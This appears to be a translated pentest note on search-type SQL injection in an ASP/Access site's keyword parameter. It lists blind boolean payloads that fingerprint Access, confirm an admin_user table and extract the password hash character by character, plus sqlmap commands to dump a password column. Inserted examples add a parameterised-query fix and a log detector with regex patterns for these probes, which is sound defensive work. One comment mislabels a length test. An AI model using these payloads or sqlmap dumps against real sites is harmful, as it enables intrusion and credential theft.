Parameter-based injection comes in several forms: numeric and string injection, which everyone knows, plus a third kind, search-type injection.
Numeric: id=1 and 1=1
String: id=1' and 1=1 # (or close the statement with --)
Search-type injection:
Built around like, *, %%
select * from news where id like '%$id%'
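The query above is the shape that makes search-type injection possible: the keyword is spliced into the LIKE pattern as text, so a quote in the input closes the string and whatever follows becomes SQL. The following is an added example (not code from the original page) that builds that vulnerable search next to a bound-parameter version in SQLite, which stands in here for the page's Access/ASP setup; the table rows and the search_vulnerable/search_safe function names are constructed for the demonstration.

```python
import sqlite3

# Constructed sample rows standing in for the page's "news" table.
NEWS_ROWS = [
    (1, "2023 budget report"),
    (2, "2024 release notes"),
    (3, "welcome 2% discount"),
]


def make_db():
    """In-memory SQLite database with the constructed news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news(id integer primary key, title text)")
    conn.executemany("insert into news values (?, ?)", NEWS_ROWS)
    return conn


def search_vulnerable(conn, keyword):
    """The pattern the page describes: user input spliced straight into LIKE '%...%'."""
    sql = "select id from news where title like '%" + keyword + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, keyword):
    """Bound parameter plus ESCAPE, so quotes and wildcards in the input match literally."""
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = "select id from news where title like ? escape '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


if __name__ == "__main__":
    conn = make_db()
    probe = "2%' and 1=1 and '%'='"   # the page's wildcard-balanced probe
    print("vulnerable, plain '2':  ", search_vulnerable(conn, "2"))
    print("vulnerable, probe:      ", search_vulnerable(conn, probe))
    print("safe, probe (literal):  ", search_safe(conn, probe))
    print("safe, literal '2%':     ", search_safe(conn, "2%"))
```

With the bound parameter the probe string is searched for literally and matches nothing, and a user who really wants to find a title containing "2%" gets only row 3, whereas the concatenated version treats the same input as SQL and as an unescaped wildcard.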
http://127.0.0.1/search.asp?Field=Title&BigClassName=&SmallClassName=&keyword=123&Submit=%CB%D1%CB%F7
Parameter: keyword=123
'%%' and 1=2 and '%'='%'
2% and 1=1 and '%'='   returns the same page as entering 2 on its own
2%' and 1=2 and '%'='   returns a different page
2%' and (select count(*) from MSysAccessObjects)>0 and '%'='   // returns normal: the database is Access
2%' and (select count(*) from admin_user)>0 and '%'='   // returns normal: the table admin_user exists
2%' and (select count(username) from admin_user)>0 and '%'='   // returns normal: the column username exists
2%' and (select count(password) from admin_user)>0 and '%'='   // returns normal: the column password exists
2%' and (select top 1 len(username) from admin_user)>4 and '%'='   // returns normal: username is longer than 4 characters
2%' and (select top 1 len(username) from admin_user)=5 and '%'='   // returns normal: username length equals 4
2%' and (select top 1 len(password) from admin_user)=16 and '%'='   // returns an error: the password is not 16 characters, so it is probably MD5-hashed, likely 32 characters
2010%' and (select top 1 len(password) from admin_user)=32 and '%'='   // returns normal: 32 characters
2%' and (select top 1 asc(mid(password,1,1)) from admin_user)=55 and '%'='
Whereas: 2010%' and (select top 1 asc(mid(password,1,1)) from admin_user)=48 and '%'='
// returns an error, because the ASCII code of the first character of password is 55, not 48, so the result differs.
2%' and (select top 1 asc(mid(password,2,1)) from admin_user)=101 and '%'='
2%' and (select top 1 asc(mid(password,3,1)) from admin_user)=101 and '%'='
2%' and (select top 1 asc(mid(password,4,1)) from admin_user)=102 and '%'='
2%' and (select top 1 asc(mid(password,5,1)) from admin_user)=54 and '%'='
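The sequence above has a very recognisable shape in a web server log: one client sends a burst of requests to the same search endpoint whose keyword parameter contains a closing quote followed by AND, a COUNT/LEN/ASC subquery, and the '%'=' tail that rebalances the wildcards, with the response size flipping between the "normal" and "error" page. The following is an added example (not code from the original page) that parses constructed Apache-style log lines, URL-decodes the keyword parameter and flags those markers; the log lines, IP addresses and the analyze/injection_signals/probes_per_ip function names are all constructed for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed sample log lines (common log format). The three 10.0.0.9 requests carry
# URL-encoded forms of the page's probes; the other two are ordinary searches.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.asp?Field=Title&keyword=123&Submit=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search.asp?Field=Title&keyword=2%25%27+and+1%3D2+and+%27%25%27%3D%27&Submit=1 HTTP/1.1" 200 3050
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.asp?Field=Title&keyword=2%25%27+and%28select+count%28*%29from+admin_user%29%3E0+and+%27%25%27%3D%27&Submit=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.asp?Field=Title&keyword=2%25%27+and%28select+top+1+asc%28mid%28password%2C1%2C1%29%29from+admin_user%29%3D55+and+%27%25%27%3D%27&Submit=1 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.asp?Field=Title&keyword=100%25+cotton&Submit=1 HTTP/1.1" 200 4800
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Markers of the blind, wildcard-balanced probes shown on the page; order is preserved
# in the returned labels so a finding reads in the same order as the payload.
SIGNS = [
    (re.compile(r"'\s*and\b", re.I), "quote followed by AND"),
    (re.compile(r"\bselect\s+(top\s+\d+\s+)?(count|len|asc)\s*\(", re.I), "subquery probe"),
    (re.compile(r"asc\s*\(\s*mid\s*\(", re.I), "character-by-character extraction"),
    (re.compile(r"'%'\s*=\s*'", re.I), "wildcard tautology tail"),
]


def parse_line(line):
    """Split one log line into client, timestamp, status, size and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, size = m.groups()
    params = parse_qs(urlparse(target).query)  # parse_qs also URL-decodes the values
    return {"ip": ip, "ts": ts, "status": int(status), "size": size,
            "params": {k: v[0] for k, v in params.items()}}


def injection_signals(value):
    """Labels of every probe marker present in one decoded parameter value."""
    return [label for pat, label in SIGNS if pat.search(value)]


def analyze(log_text, param="keyword"):
    """Return one finding per request whose search parameter carries probe markers."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or param not in rec["params"]:
            continue
        signals = injection_signals(rec["params"][param])
        if signals:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "size": rec["size"],
                             "keyword": rec["params"][param], "signals": signals})
    return findings


def probes_per_ip(findings):
    """How many flagged requests each client sent; a burst from one address is the blind-probe pattern."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["size"], f["signals"], repr(f["keyword"]))
    print(probes_per_ip(found))
```

A legitimate search such as "100% cotton" contains a wildcard but none of the markers and is not flagged; the response-size column is kept in each finding because the alternating "normal" and "error" page sizes are the oracle the probes depend on, which makes the per-client count plus the size pattern a sturdier alert than any single payload signature.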
Tools: Burp Suite, sqlmap.
sqlmap:
1. First capture the request with Burp and save it to 1.txt
sqlmap -r 1.txt --tables   enumerate table names
sqlmap -r 1.txt --columns -T "admin"   enumerate column names
sqlmap -r 1.txt -C "admin.password" -T "massage" --dump -v 2   dump column contents
Pseudo-static URLs (rewritten paths that still map to a dynamic script and its parameters):
xxxxx.html -> xxx_xx.asp
xxxx.html -> xxxx
xxx_xx.html -> xxx.asp?id=xx